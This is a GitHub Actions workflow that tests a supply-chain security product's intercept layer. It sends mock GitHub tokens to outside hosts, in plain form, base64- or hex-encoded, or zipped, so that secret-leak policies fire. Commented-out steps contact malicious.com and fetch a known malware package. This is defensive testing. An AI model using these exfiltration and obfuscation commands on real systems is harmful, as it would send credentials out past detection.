Python application #209
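---
# GitHub Actions workflow that runs a build job under the InvisiRisk PSE
# action (docker-intercept mode) and then issues a series of mock
# secret-exposure requests so the intercept layer's leak policies can be
# exercised end to end. The tokens below are test values and the target
# hosts are mock endpoints; a final job reports the run status back to the
# InvisiRisk API.
name: Python application

on:
  workflow_dispatch:

# NOTE(review): nothing in this workflow pushes to the repository, so
# contents: write is broader than the checkout step needs; confirm whether
# pse-action itself requires write access before tightening to read.
permissions:
  checks: write
  contents: write
  packages: read

jobs:
  python-application-build:
    runs-on: ubuntu-latest
    name: Run build
    steps:
      # - name: Install Git v2.50.1
      #   run: |
      #     # Install build dependencies for Git
      #     sudo apt-get update
      #     sudo apt-get install -y make libssl-dev libghc-zlib-dev libcurl4-gnutls-dev libexpat1-dev gettext wget
      #     # Download, compile, and install Git v2.50.1
      #     wget https://github.com/git/git/archive/refs/tags/v2.50.1.tar.gz -O git.tar.gz
      #     tar -xzf git.tar.gz
      #     cd git-2.50.1
      #     make prefix=/usr/local all
      #     sudo make prefix=/usr/local install
      # - name: Verify Git Version
      #   run: git --version

      # ============= InvisiRisk Setup =============
      # NOTE(review): @latest is a mutable reference, so the action code can
      # change between runs; pinning to a release tag or full commit SHA keeps
      # the policy test reproducible (same for the cleanup and analytics
      # steps below). Confirm which ref the team publishes before changing.
      - name: Setup PSE
        uses: invisirisk/pse-action@latest
        with:
          api_url: "https://app.stage.invisirisk.com"
          app_token: ${{ secrets.IR_API_KEY }}
          mode: "docker-intercept"
      # ============= InvisiRisk Setup End =============

      - uses: actions/checkout@v4

      - name: Use Python
        uses: actions/setup-python@v4
        with:
          python-version: "3.9"

      # - name: docker
      #   run: docker pull testcontainers/ryuk:0.12.0
      # - name: Install downgraded package
      #   continue-on-error: true
      #   run: pip install requests==2.31.0
      # - name: Install from unexpected source
      #   continue-on-error: true
      #   run: pip install numpy==1.9.3 --no-deps --index-url https://test.pypi.org/simple/
      # - name: Install MALWARE package
      #   continue-on-error: true
      #   run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/abilityrequests-0.0.5-py2.py3-none-any.whl.metadata
      # - name: Install with different checksum
      #   continue-on-error: true
      #   run: pip install --no-cache-dir --no-deps boto3==1.4.0 --index-url https://test.pypi.org/simple/
      # - name: Contact new endpoint
      #   continue-on-error: true
      #   run: curl https://malicious.com/
      # - name: Run unusual command
      #   continue-on-error: true
      #   run: wget https://www.w3.org/TR/PNG/iso_8859-1.txt
      # - name: Create unexpected file
      #   continue-on-error: true
      #   run: echo "Suspicious content" > suspicious2.txt
      # - name: Make cURL request
      #   run: curl https://package-registry.free.beeceptor.com/packages
      # - name: Simulate long-running task
      #   continue-on-error: true
      #   run: sleep 200
      # # # - name: 😈 Execute malicious script
      # # #   run: bash run_malicious_scripts.sh

      # Sends a mock token in a request body so the secret-leak policy fires.
      # -k disables TLS certificate verification for the mock host — presumably
      # intentional for the beeceptor endpoint; confirm.
      - name: Secret Leak Policy
        run: |
          curl -k -X GET https://vbirmock.free.beeceptor.com/hack \
            -H "Content-Type: application/json" \
            -d '{
              "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
            }'
          echo "Exit code: $?"

      # Mock token carried in the query string rather than the body.
      - name: Mock API key exposure request
        run: |
          curl "https://example.com/data?api_key=ghp_N4GLp6K2gwqWupGTRjz9P7AOth62XP5OhliA"

      # - name: Response Status Code Policy (Trigger 400 Bad Request)
      #   run: curl -k -X POST https://api.github.com/endpoint
      # - name: Mime Type Policy
      #   run: curl -s -L "https://tinyurl.com/invisirisk"

      # Builds an archive that contains a mock token so the zip-upload steps
      # below have something for the archive-scanning policy to find.
      - name: 📝 Create and Compress the File
        run: |
          # 1. Create a dummy file for the mock. A quoted heredoc is used so the
          #    JSON's double quotes survive; with echo "..." the inner quotes
          #    terminated the shell string and were stripped from the file.
          cat > dummy_file.txt <<'EOF'
          -d '{"data":{"GH":"ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"}}'
          EOF
          # 2. Create the leaks.zip file in the working directory
          zip leaks.zip dummy_file.txt

      # Same as above, but the token inside the archive is base64-encoded.
      - name: 📝 Create and Compress the File With base64 secrets
        run: |
          # 1. Create a dummy file for the mock (quoted heredoc keeps the JSON
          #    quotes intact, see the previous step)
          cat > dummy_file_64.txt <<'EOF'
          -d '{"data":{"GH":"WjJod1gwUkZSbnB0WnpkU1NISlJNbVZOWlRKSlJqUk9lRTVYVVc5a1dYQmhZak5XVFZoWVdBPT0="}}'
          EOF
          # 2. Create the leaks.zip file in the working directory
          zip leaks64.zip dummy_file_64.txt

      - name: 🚀 Upload the generated Zip File
        run: |
          # Since the 'zip' command ran in the root directory,
          # the path is simply 'leaks.zip'
          # -F already sends multipart/form-data with a boundary generated by
          # curl; overriding Content-Type by hand drops that boundary and
          # leaves the receiver unable to parse the upload, so no -H here.
          curl -X POST https://archivedSecrets.com \
            -F "file=@leaks.zip"

      - name: 🚀 Upload the generated Zip File base64
        run: |
          # Since the 'zip' command ran in the root directory,
          # the path is simply 'leaks.zip'
          # Content-Type is left to curl for the same reason as the step above.
          curl -X POST https://archivedSecretsbase64.com \
            -F "file=@leaks64.zip"

      # The following steps send the same mock token under different
      # encodings so each decoding layer of the policy can be checked.
      - name: Mock API key exposure request (Normal)
        run: |
          curl -X POST https://normalsecrets.com \
            -H "Content-Type: application/json" \
            -d '{"data":{"GH":"ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"}}'

      - name: Mock API key exposure request (HEX to BASE64)
        run: |
          curl -X POST https://HEXtoBase64.com \
            -H "Content-Type: application/json" \
            -d '{"data":{"GH":"Njc2ODcwNWY0NDQ1NDY3YTZkNjczNzUyNDg3MjUxMzI2NTRkNjUzMjQ5NDYzNDRlNzg0ZTU3NTE2ZjY0NTk3MDYxNjIzMzU2NGQ1ODU4NTg="}}'

      - name: Mock API key exposure request (HEX to BASE64 to HEX)
        run: |
          curl -X POST https://HEXtoBase64toHEX.com \
            -H "Content-Type: application/json" \
            -d '{"data":{"GH":"4e6a63324f4463774e5759304e4451314e44593359545a6b4e6a637a4e7a55794e4467334d6a55784d7a49324e54526b4e6a557a4d6a51354e44597a4e44526c4e7a67305a5455334e5445325a6a59304e546b334d4459784e6a497a4d7a55324e4751314f4455344e54673d"}}'

      - name: 3 level base64 encoding secrets
        run: |
          curl -X POST https://base64encodedsecrets.com \
            -H "Content-Type: application/json" \
            -d '{"data":{"GH":"V2pKb2QxZ3dVa1pTYm5CMFducGtVMU5JU2xKTmJWWk9XbFJLU2xKcVVrOWxSVFZZVlZjNWExZFlRbWhaYWs1WFZGWm9XVmRCUFQwPQ=="}}'

      - name: hex encoded
        run: |
          curl -X POST https://hexencodedsecrets.com \
            -H "Content-Type: application/json" \
            -d '{"data":{"GH":"6768705f4445467a6d67375248725132654d65324946344e784e57516f645970616233564d585858"}}'

      # Exercises the response-side scan: the secret arrives in the reply body
      # rather than being sent by the job.
      - name: secrets on response
        run: |
          curl -k https://pastebin.com/raw/V4FrgKcm

      # - name: Send POST request with curl
      #   run: |
      #     curl -X POST https://example.com/api \
      #       -H "Content-Type: application/json" \
      #       -d '{"key1":"value1", "key2":"value2"}'
      # - name: new host
      #   run: curl https://www.google.com
      # - name: Simple PUT request
      #   run: |
      #     curl -X PUT https://example.com/api/resource \
      #       -H "Content-Type: application/json" \
      #       -d '{"key": "value"}'
      # - name: Install dependencies
      #   run: pip install -r requirements.txt

      # ============= InvisiRisk Cleanup =============
      # Runs even when an earlier step failed so the intercept layer is
      # always torn down.
      - name: Cleanup PSE
        if: always()
        uses: invisirisk/pse-action@latest
        with:
          cleanup: "true"
      # ============= InvisiRisk Cleanup End =============

  gather_analytics:
    runs-on: ubuntu-latest
    name: Gather Analytics
    needs: python-application-build
    # always() so the build job's status is reported whether it passed or not.
    if: always()
    steps:
      - name: Gather Status
        uses: invisirisk/pse-action@latest
        with:
          api_url: "https://app.stage.invisirisk.com"
          app_token: ${{ secrets.IR_API_KEY }}
          send_job_status: "true"
          debug: "true"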